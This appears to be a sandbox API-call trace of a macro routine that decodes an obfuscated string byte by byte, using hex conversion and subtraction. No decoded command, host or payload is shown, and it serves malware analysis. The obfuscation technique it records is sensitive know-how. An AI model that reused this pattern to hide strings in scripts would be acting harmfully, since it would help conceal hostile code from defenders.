VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.928] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.928] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.928] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.928] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.928] GetUserDefaultLCID () returned 0x409 [0174.928] malloc (_Size=0xa0) returned 0x11f50080 [0174.929] free (_Block=0x11f50080) [0174.929] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.929] GetUserDefaultLCID () returned 0x409 [0174.929] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.929] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.929] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.929] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.929] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.929] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.929] GetUserDefaultLCID () returned 0x409 [0174.929] malloc (_Size=0xa0) returned 0x11f50080 [0174.929] free (_Block=0x11f50080) [0174.930] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.930] GetUserDefaultLCID () returned 0x409 [0174.930] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.930] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.930] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.930] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.930] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.930] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.930] GetUserDefaultLCID () returned 0x409 [0174.930] malloc (_Size=0xa0) returned 0x11f50080 [0174.930] free (_Block=0x11f50080) [0174.931] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.931] GetUserDefaultLCID () returned 0x409 [0174.931] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.931] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.931] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.931] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.931] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.931] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.931] GetUserDefaultLCID () returned 0x409 [0174.931] malloc (_Size=0xa0) returned 0x11f50080 [0174.931] free (_Block=0x11f50080) [0174.932] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.932] GetUserDefaultLCID () returned 0x409 [0174.932] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.932] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.932] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.932] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.932] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.932] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.932] GetUserDefaultLCID () returned 0x409 [0174.932] malloc (_Size=0xa0) returned 0x11f50080 [0174.932] free (_Block=0x11f50080) [0174.933] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.933] GetUserDefaultLCID () returned 0x409 [0174.933] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.933] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.933] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.933] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.933] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.933] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.933] GetUserDefaultLCID () returned 0x409 [0174.933] malloc (_Size=0xa0) returned 0x11f50080 [0174.933] free (_Block=0x11f50080) [0174.934] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.934] GetUserDefaultLCID () returned 0x409 [0174.934] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.935] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.935] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.935] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.935] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.935] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.935] GetUserDefaultLCID () returned 0x409 [0174.935] malloc (_Size=0xa0) returned 0x11f50080 [0174.935] free (_Block=0x11f50080) [0174.936] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.936] GetUserDefaultLCID () returned 0x409 [0174.936] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.936] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.936] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.936] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.936] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.936] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.936] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.937] GetUserDefaultLCID () returned 0x409 [0174.937] malloc (_Size=0xa0) returned 0x11f50080 [0174.937] free (_Block=0x11f50080) [0174.937] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.937] GetUserDefaultLCID () returned 0x409 [0174.937] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.937] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.937] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.938] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.938] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.938] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.938] GetUserDefaultLCID () returned 0x409 [0174.938] malloc (_Size=0xa0) returned 0x11f50080 [0174.938] free (_Block=0x11f50080) [0174.938] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.938] GetUserDefaultLCID () returned 0x409 [0174.938] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.938] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.939] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.939] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.939] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.939] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.939] GetUserDefaultLCID () returned 0x409 [0174.939] malloc (_Size=0xa0) returned 0x11f50080 [0174.939] free (_Block=0x11f50080) [0174.939] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.939] GetUserDefaultLCID () returned 0x409 [0174.939] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.940] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.940] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.940] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.940] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.940] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.940] GetUserDefaultLCID () returned 0x409 [0174.940] malloc (_Size=0xa0) returned 0x11f50080 [0174.940] free (_Block=0x11f50080) [0174.941] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.941] GetUserDefaultLCID () returned 0x409 [0174.941] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.941] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.941] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.941] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.941] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.941] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.941] GetUserDefaultLCID () returned 0x409 [0174.941] malloc (_Size=0xa0) returned 0x11f50080 [0174.941] free (_Block=0x11f50080) [0174.942] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.942] GetUserDefaultLCID () returned 0x409 [0174.942] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.942] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.942] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.942] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.942] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.942] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.942] GetUserDefaultLCID () returned 0x409 [0174.942] malloc (_Size=0xa0) returned 0x11f50080 [0174.943] free (_Block=0x11f50080) [0174.943] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.943] GetUserDefaultLCID () returned 0x409 [0174.943] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.943] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.943] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.943] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.944] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.944] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.944] GetUserDefaultLCID () returned 0x409 [0174.944] malloc (_Size=0xa0) returned 0x11f50080 [0174.944] free (_Block=0x11f50080) [0174.944] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.944] GetUserDefaultLCID () returned 0x409 [0174.944] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.944] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.945] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.945] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.945] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.945] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.945] GetUserDefaultLCID () returned 0x409 [0174.945] malloc (_Size=0xa0) returned 0x11f50080 [0174.945] free (_Block=0x11f50080) [0174.945] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.945] GetUserDefaultLCID () returned 0x409 [0174.946] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.946] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.946] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.946] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.946] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.946] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.946] GetUserDefaultLCID () returned 0x409 [0174.946] malloc (_Size=0xa0) returned 0x11f50080 [0174.946] free (_Block=0x11f50080) [0174.947] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.947] GetUserDefaultLCID () returned 0x409 [0174.947] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.947] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.947] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.947] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.947] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.947] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.947] 